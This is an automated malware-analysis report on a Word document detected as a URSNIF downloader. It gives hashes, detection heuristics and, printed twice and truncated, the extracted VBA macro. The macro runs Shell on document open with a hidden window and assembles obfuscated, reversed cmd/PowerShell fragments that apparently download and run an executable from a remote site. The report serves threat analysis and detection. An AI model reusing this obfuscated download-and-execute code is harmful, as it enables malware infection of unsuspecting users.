Office (OLE) malware analysis — malicious · 20dc9bef3d5831a7

MALICIOUS

Office (OLE)

72.1 KB Created: 2018-09-11 10:48:00 Authoring application: Microsoft Office Word First seen: 2018-10-09

MD5: 1d84e2b1d2e641d861544f2faa57074e SHA-1: 685e07fada82330e4ae3e55d1c16677ade192b5a SHA-256: 20dc9bef3d5831a71cc98aebcd3b84ae259a5a9b882a7fb7ae41567777eb1cb3

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro that executes the Shell() function, indicating an attempt to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' strongly suggests a downloader family. The Document_Open macro is a common technique for initiating malicious actions upon document opening.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6749 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6749 bytes
SHA-256: `7a9db0b3c2f2d6163800ab65cc469f25c12bd761303af9e4214ef45d633ec0ab`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wUqniJN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next VarType "2199" + "4777" + "6502" + "JduA" VarType "YJQjhoTUaG" + "9273" VarType "mShb" + "495619813" + "o" + "1217" VarType "QAUYYZv" + "QT" + "QuYoQwzsms" + "3522" VarType "26951348" + "27721404" VarType "457642371" + "Zw" + "poutjpbQzdl" + "rBTj" VarType "p" + "kVQWTk" VarType "pwKWmshc" + "8038" Shell sHUrUVruHj + UkiNZL + kuRhihOo + SuZpUo, Format(vbHide) VarType "QLib" + "291068158" VarType "PNrPClXjF" + "8016" End Sub Attribute VB_Name = "JViqjNE" Function sHUrUVruHj() On _ Error _ Resume _ Next VarType "O" + "8804" + "OFkuuOBUoFznw" + "DQNGWCk" VarType "RJqw" + "5009" VarType "l" + "jLLnqKmkqjJk" VarType "w" + "125339705" + "TjtWlhL" + "ii" VarType "433523758" + "423796162" + "fqBjtiC" + "bXHLlU" EXtwYuwhGwU = Format(Chr(4 + 9 + 10 + 6 + 70)) + "m" + "d" + " " + "/V" + "^:ON/" + Format(Chr(2 + 6 + 7 + 4 + 48)) + Format(Chr(1 + 3 + 3 + 2 + 25)) + "s^e" + "^t" + " ^F" + "^w0" + "=^ " + "^ ^ " VarType "1489" + "lnUrPQMpjvtLz" VarType "6192" + "KF" + "5066" + "129354974" VarType "P" + "DmBEMLm" VarType "fImm" + "YQqLR" hwXfBY = "^ ^" + " " + "^ ^ ^ " + "^ ^ " + "^}^}{^h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "ta" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^}" + ";^k" + "^aerb;^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^" + " m^e^t" + "^" VarType "biJTIwq" + "URthoI" VarType "2443" + "s" + "OfiGSr" + "7687" VarType "aXF" + "G" + "HcDdASSVJa" + "1125" VarType "OwA" + "cSPsv" + "LdPvzGd" + "426513014" pmLVpi = "I^" + "-^e^k^o" + "vnI^" + ";)^F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^ ^," + "^tBK^$" + "(^el^i^" + "F^d" + "^a^o^ln" + "w^" VarType "9566" + "441695958" + "328047719" + "pGA" VarType "BBJG" + "GaIM" QsMiH = "o^" + "D^.^" + "KR" + "N" + "${yr^t^" VarType "iw" + "Nz" + "377309567" + "SIV" VarType "136454831" + "477165620" VarType "aQQ" + "283245583" VarType "miSt" + "7408" qKBXWWQdNJ = "{)lEh" + "^$ n^" + "i ^t^B" + "K^$(" + "h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^aer" + "^o^f;" + "'" sHUrUVruHj = EXtwYuwhGwU + hwXfBY + pmLVpi + QsMiH + qKBXWWQdNJ VarType "1258" + "ZvQtot" VarType "1212" + "4461" End Function Function UkiNZL() On _ Error _ Resume _ Next VarType "EGBJ" + "9483" + "iRVODFXo" + "166559592" VarType "nqA" + "aUt" VarType "hMJE" + "3729" + "CTRWfOiihmUfQ" + "7367" GDEiThMB = "^exe.'+" + "^Uz" + "w^" + "$+" + "'^\" + "'^+" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "i" VarType "Pq" + "qUbwjbk" VarType "6631" + "202324990" + "451683710" + "NFv" oKiUd = "^l" + "^b^u^p:" + "vn" + "e$^=^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70)) VarType "vbLAMOkwDSZ" + "3273" + "pVOTEptf" + "cJ" VarType "IVIHIH" + "A" vrcVptR = "Z" + "^" + "$^;^'^3" + "^3^3' =" + " ^Uzw" + "^$^;" + ")^'^@" + "^'(" + "ti" + "l^pS^." + "^" VarType "370046613" + "HOiJGVYd" + "k" + "nutBGKrQTRpSE" VarType "5781" + "rvLXrnIX" SDGdRjHzpD = "'^ORG" + "/se" + "^gam^" + "i/x" + "^u^" + "d^er^" + "-^d" + "emar" + "^f/s^em" + "eh^t/tn" VarType "851" + "SisHfX" + "KuaRQPkZVr" + "1059" VarType "jZ" + "DjPzMhONHBsJlu" VarType "6074" + "vaQd" + "9940" + "29347307" KSEfaAsw = "etn" + "^" + "o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "-" + "^pw" + "/m^o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + ".re^" + "se" + "y" + "la//:^p" + "t" + "^t^h" UkiNZL = GDEiThMB + oKiUd + vrcVptR + SDGdRjHzpD + KSEfaAsw VarType "1308" + "485983852" VarType "JfiBOwt" + "2756" + "273624648" + "kTvUaOjFFCrjw" End Function Function kuRhihOo() On _ Error _ Resume _ Next VarType "CMqhjHAT" + "N" + "TmF" + "uzm" VarType "UfpsajFQBoID" + "FQ" VarType "QKGVwoW" + "1338" + "PlIW" + "8900" knALszN = "^@" + "RY" + "^" + "WR^B/^m" + "^o" + Format(Chr(4 + 9 ... (truncated)

SHA-256: 7a9db0b3c2f2d6163800ab65cc469f25c12bd761303af9e4214ef45d633ec0ab

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wUqniJN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "2199" + "4777" + "6502" + "JduA"
   VarType "YJQjhoTUaG" + "9273"
   VarType "mShb" + "495619813" + "o" + "1217"
   VarType "QAUYYZv" + "QT" + "QuYoQwzsms" + "3522"
   VarType "26951348" + "27721404"
   VarType "457642371" + "Zw" + "poutjpbQzdl" + "rBTj"
   VarType "p" + "kVQWTk"
   VarType "pwKWmshc" + "8038"
Shell sHUrUVruHj + UkiNZL + kuRhihOo + SuZpUo, Format(vbHide)
   VarType "QLib" + "291068158"
   VarType "PNrPClXjF" + "8016"
End Sub



Attribute VB_Name = "JViqjNE"
Function sHUrUVruHj()

On _
Error _
Resume _
Next
VarType "O" + "8804" + "OFkuuOBUoFznw" + "DQNGWCk"
   VarType "RJqw" + "5009"
   VarType "l" + "jLLnqKmkqjJk"
   VarType "w" + "125339705" + "TjtWlhL" + "ii"
   VarType "433523758" + "423796162" + "fqBjtiC" + "bXHLlU"
EXtwYuwhGwU = Format(Chr(4 + 9 + 10 + 6 + 70)) + "m" + "d" + " " + "/V" + "^:ON/" + Format(Chr(2 + 6 + 7 + 4 + 48)) + Format(Chr(1 + 3 + 3 + 2 + 25)) + "s^e" + "^t" + " ^F" + "^w0" + "=^ " + "^ ^ "
VarType "1489" + "lnUrPQMpjvtLz"
   VarType "6192" + "KF" + "5066" + "129354974"
   VarType "P" + "DmBEMLm"
   VarType "fImm" + "YQqLR"
hwXfBY = "^   ^" + "  " + "^ ^  ^ " + "^ ^    " + "^}^}{^h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "ta" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^}" + ";^k" + "^aerb;^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^" + " m^e^t" + "^"
VarType "biJTIwq" + "URthoI"
   VarType "2443" + "s" + "OfiGSr" + "7687"
   VarType "aXF" + "G" + "HcDdASSVJa" + "1125"
   VarType "OwA" + "cSPsv" + "LdPvzGd" + "426513014"
pmLVpi = "I^" + "-^e^k^o" + "vnI^" + ";)^F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^ ^," + "^tBK^$" + "(^el^i^" + "F^d" + "^a^o^ln" + "w^"
VarType "9566" + "441695958" + "328047719" + "pGA"
   VarType "BBJG" + "GaIM"
QsMiH = "o^" + "D^.^" + "KR" + "N" + "${yr^t^"
VarType "iw" + "Nz" + "377309567" + "SIV"
   VarType "136454831" + "477165620"
   VarType "aQQ" + "283245583"
   VarType "miSt" + "7408"
qKBXWWQdNJ = "{)lEh" + "^$ n^" + "i ^t^B" + "K^$(" + "h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^aer" + "^o^f;" + "'"
sHUrUVruHj = EXtwYuwhGwU + hwXfBY + pmLVpi + QsMiH + qKBXWWQdNJ
   VarType "1258" + "ZvQtot"
   VarType "1212" + "4461"
End Function
Function UkiNZL()

On _
Error _
Resume _
Next
VarType "EGBJ" + "9483" + "iRVODFXo" + "166559592"
   VarType "nqA" + "aUt"
   VarType "hMJE" + "3729" + "CTRWfOiihmUfQ" + "7367"
GDEiThMB = "^exe.'+" + "^Uz" + "w^" + "$+" + "'^\" + "'^+" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "i"
VarType "Pq" + "qUbwjbk"
   VarType "6631" + "202324990" + "451683710" + "NFv"
oKiUd = "^l" + "^b^u^p:" + "vn" + "e$^=^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70))
VarType "vbLAMOkwDSZ" + "3273" + "pVOTEptf" + "cJ"
   VarType "IVIHIH" + "A"
vrcVptR = "Z" + "^" + "$^;^'^3" + "^3^3' =" + " ^Uzw" + "^$^;" + ")^'^@" + "^'(" + "ti" + "l^pS^." + "^"
VarType "370046613" + "HOiJGVYd" + "k" + "nutBGKrQTRpSE"
   VarType "5781" + "rvLXrnIX"
SDGdRjHzpD = "'^ORG" + "/se" + "^gam^" + "i/x" + "^u^" + "d^er^" + "-^d" + "emar" + "^f/s^em" + "eh^t/tn"
VarType "851" + "SisHfX" + "KuaRQPkZVr" + "1059"
   VarType "jZ" + "DjPzMhONHBsJlu"
   VarType "6074" + "vaQd" + "9940" + "29347307"
KSEfaAsw = "etn" + "^" + "o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "-" + "^pw" + "/m^o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + ".re^" + "se" + "y" + "la//:^p" + "t" + "^t^h"
UkiNZL = GDEiThMB + oKiUd + vrcVptR + SDGdRjHzpD + KSEfaAsw
   VarType "1308" + "485983852"
   VarType "JfiBOwt" + "2756" + "273624648" + "kTvUaOjFFCrjw"
End Function
Function kuRhihOo()

On _
Error _
Resume _
Next
VarType "CMqhjHAT" + "N" + "TmF" + "uzm"
   VarType "UfpsajFQBoID" + "FQ"
   VarType "QKGVwoW" + "1338" + "PlIW" + "8900"
knALszN = "^@" + "RY" + "^" + "WR^B/^m" + "^o" + Format(Chr(4 + 9 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.